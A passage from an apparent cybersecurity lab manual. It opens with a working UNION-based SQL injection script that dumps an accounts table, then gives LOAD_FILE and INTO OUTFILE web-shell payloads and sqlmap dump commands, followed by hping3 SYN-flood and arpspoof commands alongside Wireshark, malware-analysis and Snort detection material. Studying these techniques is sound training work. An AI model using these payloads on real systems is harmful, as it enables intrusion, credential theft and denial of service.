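    body = page("' UNION SELECT %s%s-- " % (", ".join(cols), suffix))
    fields = [line.split("|") for line in body.splitlines() if line]
    return [tuple(f[reflected.index(slot)] for slot in exprs) for f in fields]


def list_tables(page, ncols, reflected):
    """sqlite_master plays the role of information_schema.tables here."""
    rows = union_rows(page, ncols, reflected, {reflected[0]: "name"},
                      " FROM sqlite_master WHERE type = 'table'")
    return sorted(r[0] for r in rows)


def list_columns(page, ncols, reflected, table):
    """pragma_table_info() plays the role of information_schema.columns here."""
    rows = union_rows(page, ncols, reflected, {reflected[0]: "name"},
                      " FROM pragma_table_info('%s')" % table)
    return sorted(r[0] for r in rows)


def dump_table(page, ncols, reflected, table, columns):
    """Dump the named columns of a table, one column per reflected position."""
    exprs = dict(zip(reflected, columns))
    return union_rows(page, ncols, reflected, exprs, " FROM %s" % table)


if __name__ == "__main__":
    conn = build_target_db()
    page = lambda payload: vulnerable_page(conn, payload)
    ncols = find_column_count(page)
    reflected = find_reflected_columns(page, ncols)
    print("columns:", ncols, "reflected:", reflected)
    print("tables:", list_tables(page, ncols, reflected))
    print("accounts columns:", list_columns(page, ncols, reflected, "accounts"))
    for row in dump_table(page, ncols, reflected, "accounts",
                          ["username", "password", "is_admin"]):
        print("  ", row)
    safe = lambda payload: hardened_page(conn, payload)
    print("hardened: columns", find_column_count(safe),
          "reflected", find_reflected_columns(safe, ncols))
```

Running it prints the column count (5), the reflected positions ([2, 3, 4]), both table names, the five accounts columns and the three dumped rows. Against hardened_page() the ORDER BY probe never errors and the marker probe returns nothing, which is the quick check that the injection point is closed.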

Reading and writing files on the web server

This section shows how to read files on the target machine and how to write your own files onto it through the injection point, without ever reaching the administration panel of the target website.

The LOAD_FILE() function reads the contents of a file on the database server, which in this lab is the same machine as the web server. A common first check is /etc/passwd, which lists the local user accounts. On modern systems the password hashes live in /etc/shadow, so what you usually gain here is a list of usernames for later brute-force attempts. LOAD_FILE() only works if the database user holds the FILE privilege, the MySQL process can read the file, and the path is allowed by the secure_file_priv setting; otherwise it returns NULL.

Ex: (union select null,load_file('/etc/passwd'),null,null,null).

Next we use the SELECT ... INTO OUTFILE clause to write data to the server's file system. It takes the contents of the selected columns and writes them to a text file, which is convenient for tidying up extracted data, but the same mechanism can drop a PHP web shell onto the server for remote command execution when the file lands in a directory the web server executes PHP from. Like LOAD_FILE(), it requires the FILE privilege and a path allowed by secure_file_priv, the MySQL process must have write access to that directory, and MySQL refuses to overwrite an existing file.

Ex: (union select null,'Hello World!',null,null,null into outfile '/tmp/[Link]').

In this example we write the text "Hello World!" to a file in the /tmp directory. That string could be substituted with any PHP web shell you want to run on the target, provided the file is written somewhere the web server serves and executes PHP.

As shown in the image, our text was written to the file in /tmp.
Discovering SQL injections and extracting data using SQLmap

Sqlmap is one of the most popular and powerful SQL injection automation tools. Given a vulnerable HTTP request or URL, sqlmap can exploit the remote database and extract database names, tables, columns and the data in those tables, and under certain conditions it can even read and write files on the remote file system.

Sqlmap can be tricky when you are unfamiliar with it. This tutorial presents its most important functions in a quick and practical way. To start sqlmap and list all available options, type sqlmap --help; it prints everything you need to know, with usage examples. Let's look at the tool more closely.

Then copy the URL of the vulnerable page and pass it to sqlmap. Quote the URL so the shell does not interpret the & characters.

Ex: (sqlmap -u "[Link]&username=test&password=test&user-info-php-submit-button=View+Account+Details").

Here -u specifies the target URL to test for SQL injection.

To skip test payloads specific to other DBMSes, answer Y when asked (or pass --batch to accept the default answer to every prompt).

Within a few minutes sqlmap reports that the username parameter is injectable, as shown in the screenshot.

To find further injection points, let the process run to the end. For this exercise we stop here with Ctrl+C.

Things get interesting when it comes to extracting data. Retrieving data from an injection point by hand is tedious, especially when nothing is returned directly to the vulnerable page. Sqlmap lets the tester extract the data without the manual work. First, list all databases on the target with the same command plus the --dbs option.

Ex: (sqlmap -u "[Link]&username=test&password=test&user-info-php-submit-button=View+Account+Details" --dbs).

Sqlmap lists all available databases. To target further queries we need the current database, obtained with the same command but with --current-db in place of --dbs.

Ex: (sqlmap -u "[Link]&username=test&password=test&user-info-php-submit-button=View+Account+Details" --current-db).

The output shows that the application uses the owasp10 database.

Now list the tables of the owasp10 database with --tables -D owasp10.

Ex: (sqlmap -u "[Link]&username=test&password=test&user-info-php-submit-button=View+Account+Details" --tables -D owasp10).

As shown in the screenshot, sqlmap enumerated all tables of the owasp10 database.

Sqlmap can also enumerate the columns of a table with --columns -T <table_name> (add -D owasp10 to pin the database if sqlmap does not pick it automatically).

Ex: (sqlmap -u "[Link]&username=test&password=test&user-info-php-submit-button=View+Account+Details" --columns -T accounts).

It is even possible to dump whole tables or databases and list all the valuable data with --dump.

Ex: (sqlmap -u "[Link]&username=test&password=test&user-info-php-submit-button=View+Account+Details" --columns -T accounts --dump).

Note:

1. Sometimes sqlmap cannot connect to the URL at all and gets stuck at its first task, "testing connection to the target URL". In such cases the --random-agent option helps: it makes sqlmap send a valid User-Agent header like the ones sent by browsers such as Chrome or Firefox.

2. For URLs that are not in the form parameter=value, sqlmap cannot tell on its own where to inject, for instance a URL like [Link]. In such cases the injection point must be marked with a *.

Ex: ([Link]).

The above tells sqlmap to inject at the point marked with *.

Result:

Hence, exploiting SQL injection vulnerabilities was studied successfully.
EX NO: 7 Malware Analysis Techniques – Basic Static Analysis

Aim:

To study Malware Analysis Techniques: Basic Static Analysis.

Procedure:

What Is Basic Static Analysis

Basic static analysis means examining a file without ever executing it. It extracts all the static information in the file, such as hashes, strings, linked libraries, imported functions and resources, to build a first understanding of what the malware can do before it is run.

Fingerprinting the Malware

One of the easiest pieces of static information to extract is the file's hash value, which identifies the sample and can be looked up in malware databases. We will look at two ways of obtaining it.

Using PowerShell

If PowerShell is available on the machine, we can obtain the hash by running the Get-FileHash cmdlet (the default algorithm is SHA256; MD5 and SHA1 are also accepted):

Get-FileHash <path_to_file> -Algorithm <hash_algorithm> | Format-List

Using Freely Available Tools

Several free tools can hash files for us; NirSoft's HashMyFiles is a convenient one. You can download it from the NirSoft website. Below is how the results look after running it.

Searching for Interesting Strings

Any file that carries hard-coded data such as URLs, file paths and messages contains those values as strings, and they can reveal a lot about what the malware does. Extract them with the strings utility and filter the output with findstr:

strings <path_to_the_file> | findstr /i <text_to_search_for>

Sifting through the full output of strings can be tedious. A good approach is to combine strings with a regular expression tailored to what you are looking for. For example, when searching for IP addresses or domains, pipe the output into a regex filter:

strings <path_to_the_file> | findstr /r <regex_for_URL>

Sysinternals strings reports both ASCII and UTF-16 strings by default; the GNU strings found on Linux only reports ASCII unless you pass -e l, and Windows malware commonly stores its strings as UTF-16.


Inspecting the PE File Format

Most malware that targets Windows machines comes as a PE file. The PE (Portable Executable) format is the format Windows uses for executables, DLLs and object code.

We will not discuss the PE format in this article, as it deserves an article of its own. In the meantime there are many good resources online to start learning from.

I recommend the Microsoft documentation, starting with "PE Format" and "Peering Inside the PE", and, for a great visual representation of the PE format, [Link].
Listing the DLL’s and Imported Functions

One of the most important pieces of information we can extract statically, besides strings, is the list of loaded libraries and imported functions. From the imported functions and libraries we can infer the likely functionality of the malware: for example, imports from WS2_32.dll or WinINet point at network activity, CreateRemoteThread and WriteProcessMemory at process injection, and RegSetValueEx at persistence through the registry.

A PE viewer that lists the import table is used here: open it, then drag and drop the file onto it. The results should look something like this.

To Pack or Not Pack

Tools such as PEiD or Exeinfo PE can tell us whether the malware is packed with a known packer.

Another technique is to look at the import table and count the imports. A very small import table often indicates packing: a packed executable typically imports little more than LoadLibrary and GetProcAddress and resolves everything else at run time after unpacking itself. Other signs are unusual section names and sections whose raw size on disk is much smaller than their virtual size in memory.

Dig For Resources

As mentioned before, the PE file format consists of headers and sections. One interesting section to look at is .rsrc, the resource section, where things like images, icons, dialogs and language strings are stored. Malware sometimes hides a second executable or a configuration blob there.

To view the resource section and look for suspicious or malicious signs, we can use Angus Johnson's Resource Hacker.

Result:

Hence, the study of Malware Analysis Techniques: Basic Static Analysis was completed successfully.

EX NO: 8 Network traffic analysis and sniffing using Wireshark

Aim:

To study about Network traffic analysis and sniffing using Wireshark.

Procedure:

Wireshark

Wireshark is a network protocol analyzer (also called a network sniffer), available for free from the Wireshark website. It dissects the structure of many network protocols and shows their encapsulation. It runs on UNIX, Linux and Microsoft Windows, uses a graphical toolkit for its interface (historically GTK+, now Qt) and relies on libpcap (Npcap or WinPcap on Windows) for packet capture. Wireshark and its terminal-based companion TShark are released under the GNU General Public License.

Wireshark shares many characteristics with tcpdump. The difference is that it provides a graphical user interface (GUI) and rich display-filtering options. Like tcpdump, it lets the user see all the traffic that reaches the capture interface.

This tutorial covers the basics of capturing packets, filtering them and inspecting them. You can use Wireshark to review a suspicious program's network traffic, examine traffic flows on your network, or troubleshoot network problems.

You can download Wireshark for Windows or macOS from its official site. On Linux or another UNIX-like system you will usually find Wireshark in the distribution's package repositories; on Ubuntu, for instance, it is available in the Ubuntu Software Center.

Warning: many organizations do not permit Wireshark and similar tools on their networks. Do not use this tool at work unless you have authorization.

Launch Wireshark and select the network interface you want to listen on, then click the shark-fin icon to start capturing packets on that interface. To capture wireless traffic, select a wireless interface. Keep in mind that on a switched wired network you only see traffic addressed to your host plus broadcasts and multicasts unless you capture from a mirror port or a TAP, and that seeing other hosts' wireless frames requires monitor mode.

As soon as you select the interface, packets start appearing in real time. Wireshark captures every packet that reaches that interface.

Analyzing patterns and signatures of Ping sweeps

A ping sweep is used to discover which IP addresses are live on the network. It can be performed with ICMP, TCP or UDP; the most popular form is the ICMP ping sweep. In the ICMP variant, ICMP type 8 (echo request) packets are followed by ICMP type 0 (echo reply) packets, while in a TCP or UDP ping sweep the packets are sent to port 7, the echo port. If the target host does not run the echo service, the TCP/UDP ping sweep will not work.

For that reason the ICMP ping sweep is used most of the time. If a firewall in between blocks ICMP, even the ICMP ping sweep is useless; in that situation the ARP scan or ARP sweep, discussed next, can be used. To identify an ICMP ping sweep in Wireshark, apply the filter icmp.type==8 or icmp.type==0. A TCP ping sweep can be spotted with the filter tcp.dstport==7 and a UDP ping sweep with udp.dstport==7. If these filters return more packets than expected, a ping sweep may be in progress on your network. Be careful with the volume of such traffic, because it may simply be normal ping traffic; treat it as a scan signature only when you see an unexpected increase in ICMP traffic, typically one source contacting many destinations in a short time.

Analyzing patterns and signatures of ARP sweeps

As mentioned in the previous section, when a firewall blocks ICMP we cannot use an ICMP ping sweep. An ARP scan is used instead to discover live IPs on the local network. The attacker sends an ARP request (broadcast) for every possible IP in the chosen subnet, and an ARP reply shows that the IP is live. The advantage of this sweep is that ARP cannot be filtered or disabled, because all TCP/IP communication on the segment depends on it; blocking it would break IP communication or force static ARP entries. Its drawback is that it cannot cross layer-3 devices, so it only finds hosts on the local segment. This sweep is easily recognized with the arp display filter. A very large number of ARP requests from one sender, as in the screenshot, indicates an ARP scan or sweep.

Analyzing patterns and signatures of Stealth port scans

To identify open or closed TCP ports on a target, the stealth (SYN, half-open) scan is the most commonly used method. The attacker sends a SYN packet to the target port, as in normal TCP communication. If the port is open, the target answers with SYN+ACK; if it is closed, the target answers with RST+ACK. On receiving SYN+ACK for an open port, the attacker sends an RST, because he does not want to complete the TCP session with the target. If the target port is firewalled, the expected response is either nothing at all or an ICMP type 3 (destination unreachable) packet with code 1, 2, 3, 9, 10 or 13.

So a large number of RST packets or ICMP type 3 packets may be an indication of a stealth scan or a TCP full connect scan.

To perform a stealth (SYN) scan on the network, use the command nmap -sS [Link] in Zenmap or Nmap.

Then observe the traffic with Wireshark and compare the patterns.
Analyzing patterns and signatures of TCP full connect scans

In this scan (nmap -sT) the attacker completes the full three-way handshake to see whether a port is open. The attacker sends a SYN packet to the target port; if the port is open, the target returns SYN+ACK, and if it is closed it returns RST+ACK. After receiving SYN+ACK the attacker sends an ACK, establishing a TCP session, and then tears it down. The visible difference from the half-open scan is that final ACK, which also means the connection is logged by the target service. In Wireshark we can use the same technique as for the TCP half-open scan to recognize a full connect scan. If the target port is firewalled, the response is the same: ICMP type 3 packets with code 1, 2, 3, 9, 10 or 13. To recognize TCP scan packets (half-open and full connect), use the following filters.

• To get SYN, SYN+ACK, RST and RST+ACK packets, use the filter tcp.flags==0x002 or tcp.flags==0x012 or tcp.flags==0x004 or tcp.flags==0x014.

• To get ICMP type 3 packets with code 1, 2, 3, 9, 10 or 13, use the filter icmp.type==3 and (icmp.code==1 or icmp.code==2 or icmp.code==3 or icmp.code==9 or icmp.code==10 or icmp.code==13).
Analyzing patterns and signatures of SYN flood attacks

In a SYN flood the attacker sends a high volume of SYN packets to the server from spoofed IP addresses. The server replies with SYN+ACK to each one and leaves the connection half-open, waiting for a final ACK from a host that does not exist. In a more direct attack without IP spoofing, the attacker uses firewall rules on his own machine to drop the SYN+ACK packets before his own TCP stack can answer them. By flooding the target with SYN packets and never replying with ACK, the attacker exhausts the target's resources: the half-open connection table fills up, CPU and memory usage rise, and eventually the server can no longer serve legitimate clients, which results in a denial of service.

Attackers typically use hping3 or a similar tool to spoof random source addresses. The line below starts a SYN flood against our target.

Ex: (root@kali:~# hping3 <target_ip> -S -p 80 --rand-source --flood).

SYN flood attacks are easy to recognize once you know what to look for. As you would expect, the giveaway is the huge number of SYN packets sent to the target.

Administrators should notice the start of the attack as a sudden surge of TCP traffic. We can filter for SYN packets without an acknowledgement with the filter tcp.flags.syn == 1 and tcp.flags.ack == 0.

As you can see, there is a high volume of SYN packets with almost no variation in timing. Each SYN packet comes from a different source IP address, with destination port 80 (HTTP), a length of 0 and a window size of 512; identical packet sizes and window sizes across many sources are typical of tool-generated traffic rather than real clients.
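The four signatures described in this and the previous three sections (ICMP ping sweep, ARP sweep, SYN and full connect scans, SYN flood), as one added Python example that is not part of the original lab: it encodes the Wireshark filters as detection logic and runs it over a constructed capture containing a normal handshake, a ping sweep, an ARP sweep, a SYN scan of one host and a spoofed SYN flood. The packet records and addresses are made up; the thresholds are assumptions to tune for your own network, and real captures would also be judged on timing, which this example leaves out.

```python
from collections import defaultdict, namedtuple

# One record per captured frame. Fields not meaningful for a protocol are None.
Packet = namedtuple("Packet", "proto src dst sport dport flags icmp_type arp_op")


def tcp(src, dst, sport, dport, flags):
    return Packet("tcp", src, dst, sport, dport, flags, None, None)


def icmp(src, dst, icmp_type):
    return Packet("icmp", src, dst, None, None, None, icmp_type, None)


def arp(src, dst, op):  # op 1 = request (who-has), 2 = reply
    return Packet("arp", src, dst, None, None, None, None, op)


def build_sample_capture():
    """Constructed capture: one normal handshake plus the four attack patterns."""
    pk = [tcp("10.0.0.7", "10.0.0.10", 51000, 443, "S"),
          tcp("10.0.0.10", "10.0.0.7", 443, 51000, "SA"),
          tcp("10.0.0.7", "10.0.0.10", 51000, 443, "A")]
    # ICMP ping sweep: echo requests from 10.0.0.5 to 20 hosts, two of them reply
    pk += [icmp("10.0.0.5", "10.0.0.%d" % i, 8) for i in range(1, 21)]
    pk += [icmp("10.0.0.%d" % i, "10.0.0.5", 0) for i in (7, 10)]
    # ARP sweep: who-has for 40 addresses from the same host (netdiscover style)
    pk += [arp("10.0.0.5", "10.0.0.%d" % i, 1) for i in range(1, 41)]
    # SYN (stealth) scan of 10.0.0.10: 22, 80 and 443 open, the rest closed
    for port in (21, 22, 23, 25,80, 110, 443, 445, 3306, 8080):
        pk.append(tcp("10.0.0.5", "10.0.0.10", 40000, port, "S"))
        if port in (22, 80, 443):
            pk.append(tcp("10.0.0.10", "10.0.0.5", port, 40000, "SA"))
            pk.append(tcp("10.0.0.5", "10.0.0.10", 40000, port, "R"))
        else:
            pk.append(tcp("10.0.0.10", "10.0.0.5", port, 40000, "RA"))
    # SYN flood: 100 spoofed sources hit 10.0.0.10:80 and never complete the handshake
    pk += [tcp("198.51.100.%d" % i, "10.0.0.10", 50000 + i, 80, "S") for i in range(1, 101)]
    return pk


def detect_ping_sweep(pkts, min_hosts=10):
    """icmp.type==8 fanned out to many destinations from one source."""
    targets = defaultdict(set)
    for p in pkts:
        if p.proto == "icmp" and p.icmp_type == 8:
            targets[p.src].add(p.dst)
    return {src: len(d) for src, d in targets.items() if len(d) >= min_hosts}


def detect_arp_sweep(pkts, min_hosts=10):
    """Many ARP who-has requests from one sender: the storm the 'arp' filter shows."""
    targets = defaultdict(set)
    for p in pkts:
        if p.proto == "arp" and p.arp_op == 1:
            targets[p.src].add(p.dst)
    return {src: len(d) for src, d in targets.items() if len(d) >= min_hosts}


def detect_port_scan(pkts, min_ports=5):
    """SYN-only probes (tcp.flags==0x002) to many ports on one host; the SYN+ACK
    (0x012) and RST+ACK (0x014) replies tell open ports from closed ones."""
    probes = defaultdict(set)
    for p in pkts:
        if p.proto == "tcp" and p.flags == "S":
            probes[(p.src, p.dst)].add(p.dport)
    report = {}
    for (src, dst), ports in probes.items():
        if len(ports) < min_ports:
            continue
        replies = [p for p in pkts if p.proto == "tcp" and p.src == dst and p.dst == src]
        opened = sorted({p.sport for p in replies if p.flags == "SA"})
        closed = sorted({p.sport for p in replies if p.flags == "RA"})
        report[(src, dst)] = {"probed": len(ports), "open": opened, "closed": closed}
    return report


def detect_syn_flood(pkts, min_sources=50):
    """Many distinct sources send SYN (tcp.flags.syn==1 and tcp.flags.ack==0) to one
    service and never send the final ACK: the half-open pattern of hping3 --rand-source."""
    syns = defaultdict(set)
    completed = set()
    for p in pkts:
        if p.proto != "tcp":
            continue
        if p.flags == "S":
            syns[(p.dst, p.dport)].add(p.src)
        elif p.flags == "A":
            completed.add((p.src, p.dst, p.dport))
    report = {}
    for (dst, dport), sources in syns.items():
        half_open = {s for s in sources if (s, dst, dport) not in completed}
        if len(half_open) >= min_sources:
            report[(dst, dport)] = len(half_open)
    return report


if __name__ == "__main__":
    capture = build_sample_capture()
    print("ping sweep :", detect_ping_sweep(capture))
    print("arp sweep  :", detect_arp_sweep(capture))
    print("port scan  :", detect_port_scan(capture))
    print("syn flood  :", detect_syn_flood(capture))
```

The normal client on 10.0.0.7 completes its handshake and never crosses a threshold, while the scanner on 10.0.0.5 shows up in three detectors at once and the flood is attributed to the service under attack rather than to any one source, since the sources are spoofed. To use this on real traffic, export the capture from Wireshark (File > Export Packet Dissections > As CSV) or read it with a pcap library and map each frame onto the Packet record.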

Analyzing patterns and signatures of ARP spoofing

ARP spoofing consists of constructing forged ARP replies. By sending forged ARP replies, a target computer can be convinced to send frames destined for computer A to computer B instead. When done properly, computer A has no idea that this redirection occurred. The process of updating a target computer's ARP cache with a forged entry is referred to as "poisoning".

To automatically detect ARP packet storms and duplicate IP addresses, Wireshark needs a small configuration change. First, click the Edit menu and select Preferences.

Under Protocols, click ARP/RARP, tick the "Detect ARP request storms" checkbox and click OK (the "Detect duplicate IP address configuration" option in the same dialog is enabled by default). Wireshark is now ready to flag packet storms and duplicate IP addresses.

Let's see this in action by scanning our network for live hosts.

Ex: (root@kali:~# netdiscover -i eth0 -r <network>/24)

The screenshot shows a vast number of ARP requests. To analyze them, open the Analyze menu and select Expert Information.

In the Expert Information window you are presented with a lot of useful information. The main point here is whether the ARP packet storm was detected, which in this case it was. If you see such traffic in your organization, somebody is scanning your network.

To analyze duplicate IP address traffic, first run the ARP spoofing command from the terminal, where the -t host is the victim and the -r host is the machine to impersonate, typically the gateway.

Ex: (root@kali:/opt# arpspoof -i eth0 -t <target_ip> -r <gateway_ip>).

Then select one of the ARP packets and open Analyze, then Expert Information, again.

Here we see a warning that a duplicate IP address has been detected: the same IP address is now claimed by two different MAC addresses, which is a clear indication of a spoofing attempt.

Sniffing usernames and passwords

In this tutorial we use Wireshark to sniff data as it is transmitted over HTTP. For this example we sniff the traffic of the Mutillidae web application, which does not use secure communication (plain HTTP, no TLS).

First, apply the http display filter to show only HTTP traffic. Then, in the Info column, look for the POST entries and click on one. Below the packet list there is a details pane with a summary of the captured data; find the entry "HTML Form URL Encoded:" and expand it. You will see the plaintext values of all the POST parameters, including the username and password, that were submitted to the server over HTTP. The same capture against an HTTPS site would only show encrypted TLS application data, which is why login forms must never be served over plain HTTP.

Result:

Hence, network traffic analysis and sniffing using Wireshark was studied successfully.
EX NO: 9 Intrusion Detection With Snort

Aim:

To study about Intrusion Detection With Snort.

Procedure:

This article explains how to install Snort and how to get started with Snort alerts and rules to implement an intrusion detection system.

Snort is an intrusion detection system that analyzes traffic and packets to detect anomalies, such as malicious traffic, and reports them. If you are not familiar with intrusion detection systems, you may want to start with the section "About Intrusion Detection system" at the end of this experiment; if you want to go straight to the practical instructions, keep reading.

After reading this article you will be able to install Snort on Debian- and Red Hat-based Linux distributions, set the different Snort modes, and define alerts and rules. The Snort usage instructions in this tutorial apply to all Linux distributions.

All instructions in this document come with screenshots to make them easy to follow and apply.

Installing Snort

You can install Snort with the apt package manager on Debian or Ubuntu, as shown in the following screenshot:

sudo apt install snort

During installation you will be asked to define your network. Press OK to continue to the next step.

Now type your network address in CIDR notation. Snort normally detects it correctly. Then press OK or Enter. Do not worry about this step; the value (the HOME_NET variable) can be edited later in the configuration.

Red Hat-based distribution users can download the Snort package from [Link] and install it with the following command, where <Version> is the version you downloaded:

sudo yum install snort-<Version>.rpm

Keeping the Snort rules updated

Snort has two main kinds of rule sets: the community rules developed by the Snort community and the official (registered) rules. The community rules can always be downloaded. To download the official rules you need an Oink Code, a per-account token that authorizes the download of the latest rule set.

To get an Oink Code, register at [Link].

After registering, confirm the account from your email and log in to the Snort website. In the dashboard's left-side menu, click Oinkcode and you will see your code.

Download the rule set that matches your installed Snort version. In my case, I used Snort [Link] and the following link to download the rules:

[Link]
[Link]?oinkcode=<your_oinkcode>

Treat the Oink Code as a credential and keep it out of scripts you share. You can create a cron job that downloads the rules and extracts them into the proper directory.

Configuring Snort

The Snort configuration file is /etc/snort/snort.conf. Before getting started, Debian users must first check the Debian-specific configuration file that the package installs alongside it and make sure all the information in it is correct, including the CIDR address and the network device. Other distribution users can continue reading.

Save the file. Let's start configuring Snort.

Open /etc/snort/snort.conf with any text editor (I used nano):

sudo nano /etc/snort/snort.conf

Define the networks and ports that you want monitored (the HOME_NET, EXTERNAL_NET and port variables near the top of the file).

Do not close the file; keep the configuration open and continue with the next section.

Snort Rules

Snort rules are enabled or disabled by commenting or uncommenting lines in /etc/snort/snort.conf; the rule files themselves live in the /etc/snort/rules directory.

To enable or disable rules, open /etc/snort/snort.conf in a text editor. The include lines for the rule files are at the end of the file.

At the end of the file you will see a list of rule files for different purposes. Uncomment the ones you want to enable and comment out the ones you want to disable.

For example, to detect traffic related to DoS attacks, uncomment the dos rules, or uncomment the ftp rules to monitor port 21.

sudo nano /etc/snort/snort.conf

After changing the rules, save and exit the editor. Before running Snort for real, check that the configuration parses with sudo snort -T -c /etc/snort/snort.conf; a missing rule file or a typo in a variable is reported there instead of at start-up.

The seven Snort alert modes

Snort has seven alert modes for reporting events or incidents:

 Fast: the alert includes the timestamp, the alert message, and the source and destination IP addresses and ports. Enable it with -A fast.
 Full: in addition to the fast-mode information, the full mode also prints the TTL, datagram length and packet headers, window size, ACK and sequence numbers. Enable it with -A full.
 Console: prints the alerts in real time to the console. Enable it with -A console.
 Cmg: only useful for testing purposes.
 Unsock: exports alerts to a Unix socket.
 Syslog: sends the alerts to syslog (System Logging Protocol), which can forward them to a remote log host. Enable it with -s.
 None: no alerts.

To finish, let's try fast mode with the following command, where -A fast selects the fast alert mode and -c specifies the configuration file (/etc/snort/snort.conf); add -i <interface> to choose the capture interface.

sudo snort -A fast -c /etc/snort/snort.conf

Now launch some Nmap scans or try to connect to your computer over SSH or FTP, then read the last lines of the alert file under /var/log/snort/ to see how the traffic is reported. As you can see, I launched an aggressive Nmap scan and it was detected as malicious traffic.

tail /var/log/snort/[Link]
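Reading the fast-mode alert file by hand stops being practical once a scan produces hundreds of lines. The following added Python example (not from the original article) parses Snort 2.x fast-format alerts and summarises them per source address: number of alerts, rule SIDs, destination ports and the highest priority seen (in Snort, priority 1 is the most severe). The alert lines are constructed to follow the fast format; the rule messages and SIDs are made up.

```python
import re

# Constructed alert lines in Snort 2.x fast-alert format. The rule messages and
# SIDs (1000001-1000004) are made up for this example.
SAMPLE_ALERTS = """\
01/28-22:26:04.885446  [**] [1:1000001:1] LAB SCAN Nmap SYN scan [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.1.5:43210 -> 192.168.1.10:22
01/28-22:26:04.885512  [**] [1:1000001:1] LAB SCAN Nmap SYN scan [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.1.5:43210 -> 192.168.1.10:80
01/28-22:26:04.885601  [**] [1:1000001:1] LAB SCAN Nmap SYN scan [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.1.5:43210 -> 192.168.1.10:443
01/28-22:26:05.102233  [**] [1:1000002:1] LAB ICMP PING Nmap [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 192.168.1.5 -> 192.168.1.10
01/28-22:27:41.004120  [**] [1:1000003:2] LAB FTP login attempt [**] [Classification: Misc activity] [Priority: 3] {TCP} 192.168.1.22:51544 -> 192.168.1.10:21
01/28-22:28:00.000001  [**] [1:1000004:1] LAB SSH brute force [**] [Priority: 1] {TCP} 192.168.1.5:50001 -> 192.168.1.10:22
garbage line that is not an alert
"""

# timestamp [**] [gid:sid:rev] msg [**] [Classification: ...] [Priority: n] {PROTO} src[:port] -> dst[:port]
# The Classification block is optional (rules without a classtype omit it); ICMP alerts carry no ports.
ALERT_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+"
    r"(?P<msg>.*?)\s+\[\*\*\]"
    r"(?:\s+\[Classification:\s*(?P<cls>[^\]]+)\])?"
    r"\s+\[Priority:\s*(?P<prio>\d+)\]\s+\{(?P<proto>\w+)\}\s+"
    r"(?P<src>[\d.]+)(?::(?P<sport>\d+))?\s+->\s+(?P<dst>[\d.]+)(?::(?P<dport>\d+))?\s*$"
)


def parse_alert(line):
    """Return a dict for one fast-format alert line, or None if the line is not an alert."""
    m = ALERT_RE.match(line.strip())
    if not m:
        return None
    alert = m.groupdict()
    for key in ("gid", "sid", "rev", "prio"):
        alert[key] = int(alert[key])
    for key in ("sport", "dport"):
        alert[key] = int(alert[key]) if alert[key] is not None else None
    return alert


def parse_alert_log(lines):
    """Parse every line that is an alert and silently skip everything else."""
    return [a for a in (parse_alert(line) for line in lines) if a]


def summarize_by_source(alerts):
    """Per source IP: alert count, rule SIDs, destination ports and most severe priority."""
    summary = {}
    for a in alerts:
        s = summary.setdefault(a["src"], {"alerts": 0, "sids": set(), "dports": set(),
                                          "highest_priority": None})
        s["alerts"] += 1
        s["sids"].add(a["sid"])
        if a["dport"] is not None:
            s["dports"].add(a["dport"])
        if s["highest_priority"] is None or a["prio"] < s["highest_priority"]:
            s["highest_priority"] = a["prio"]
    return summary


if __name__ == "__main__":
    alerts = parse_alert_log(SAMPLE_ALERTS.splitlines())
    for src, s in sorted(summarize_by_source(alerts).items(),
                         key=lambda item: -item[1]["alerts"]):
        print("%-15s alerts=%d priority=%d sids=%s ports=%s" % (
            src, s["alerts"], s["highest_priority"], sorted(s["sids"]), sorted(s["dports"])))
```

Feed it the real file with parse_alert_log(open(path)) once Snort has been running in fast mode; the per-source view is what tells a port scan (one source, many destination ports, one SID) apart from a single failed login.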

About Intrusion Detection system

The general assumption is that if a firewall protects a network, the network is secure. That is not entirely true. Firewalls are a fundamental component of a network, but they cannot fully protect it from forced entry or hostile intent. Intrusion detection systems evaluate aggressive or unexpected packets and raise an alert before they can harm the network. A host-based intrusion detection system runs on the individual devices of a network; a network-based intrusion detection system is instead deployed at a point, or group of points, from which all incoming and outgoing traffic can be monitored. The advantage of a host-based system is that it can also detect anomalies or malicious traffic generated by the host itself, for example when the host is infected with malware. An intrusion detection system (IDS) works by monitoring and analyzing network traffic and comparing it with an established rule set that defines what is normal for the network (ports, bandwidth, etc.) and what deserves a closer look.

An intrusion detection system can be deployed according to the size of the network. There are dozens of good commercial IDS products, but many companies and small businesses cannot afford them. Snort is a flexible, lightweight and popular IDS that can be deployed to fit networks from small to large and provides the features of a paid IDS; it costs nothing, but that does not mean it cannot offer the same functionality as a commercial product. Snort is considered a passive IDS: it sniffs network packets, compares them with the rule set and, when it detects a malicious entry (an intrusion), generates an alert or writes an entry to a log file. Snort is used to monitor the traffic of routers, firewalls and servers. It ships with a chain of rule sets that is helpful to someone unfamiliar with IDS, and it raises an alarm on intrusions such as buffer overflow attacks, DNS poisoning, OS fingerprinting and port scans, giving an organization greater visibility of its network traffic and making it easier to meet security regulations.

Conclusion

Intrusion detection systems like Snort monitor network traffic to detect an attack by a malicious user before it can harm the network. If an attacker performs a port scan on a network, the scan can be detected along with the number of attempts, the attacker's IP address and other details. Snort detects a wide range of anomalies. It comes with a large number of preconfigured rules and lets the user write their own rules according to their needs.

Whatever the size of the network, Snort can be set up and used without spending anything, unlike commercial intrusion detection systems. The captured packets can be analyzed further with a packet sniffer like Wireshark to reconstruct what the attacker did during the attack and which scans or commands were performed. Snort is a free, open-source and easy-to-configure tool, and a good choice for protecting a medium-sized network from attack.

Result:

Hence, the intrusion detection system was studied successfully.